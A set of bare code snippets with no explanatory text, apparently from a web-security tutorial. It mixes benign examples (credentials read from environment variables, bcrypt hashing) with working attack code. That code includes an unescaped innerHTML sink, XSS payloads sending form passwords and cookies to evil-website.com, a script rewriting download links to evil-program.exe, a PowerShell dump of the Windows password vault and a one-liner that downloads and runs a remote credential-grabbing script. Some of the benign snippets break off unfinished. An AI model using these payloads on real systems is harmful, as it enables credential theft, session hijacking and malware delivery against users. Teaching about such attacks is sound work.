🏴☠️
```python
import s3_bucket as S3
import os

# get your key data from environment variables
AWS_ACCESS_KEY_ID = os.environ.get('AWS_ACCESS_KEY_ID')
AWS_SECRET_ACCESS_KEY = os.environ.get('AWS_SECRET_ACCESS_KEY')

# initialize the package
S3.Bucket.prepare(AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY)
```
```python
def login(username, password):
    user = Users.get(username)  # fetch the user record from the database
    # if no user matches the username, don't log them in
    if not user:
        return False
    # hash the supplied password
    supplied_hash = some_hash_function(password)
```
```python
import bcrypt

# this will create the hash that you need to store in your database
def create_bcrypt_hash(password):
    # convert the string to bytes
    password_bytes = password.encode()
    # generate a salt
    salt = bcrypt.gensalt(14)
    # calculate a hash as bytes
    password_hash_bytes = bcrypt.hashpw(password_bytes, salt)
```
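```javascript
// read the text the user typed into the input
const username = document.getElementById('username_input').value;
const username_box = document.getElementById('username_box');
// the user-controlled string is written to the page as HTML, unescaped
username_box.innerHTML = username;
```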
```javascript
// add an event listener to the form
const form_element = document.getElementsByTagName('form')[0];
form_element.addEventListener('submit', () => {
    // capture the username and password from the form
    const username = document.getElementById('username_input').value;
    const password = document.getElementById('password_input').value;
    // send the username and password to the attacker
    fetch(`https://evil-website.com/password-capture/?u=${username}&p=${password}`);
```
```javascript
// capture the cookies
const cookie = document.cookie;
// send the cookies to the attacker
fetch('https://evil-website.com/cookie-capture', {
    data: cookie
});
```
```javascript
// grab all download links on the page
const download_links = document.getElementsByClassName('download-link');
// change their target to a malicious piece of software hosted on the attacker's server
for (let link of download_links) {
    link.setAttribute('href', 'https://evil-website.com/evil-program.exe');
}
```
```powershell
[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime]
$vault = New-Object Windows.Security.Credentials.PasswordVault
$vault.RetrieveAll() | % { $_.RetrievePassword();$_ } | select username,resource,password
```
```powershell
powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/HanseSecure/credgrap_ie_edge/master/credgrap_ie_edge.ps1')"
```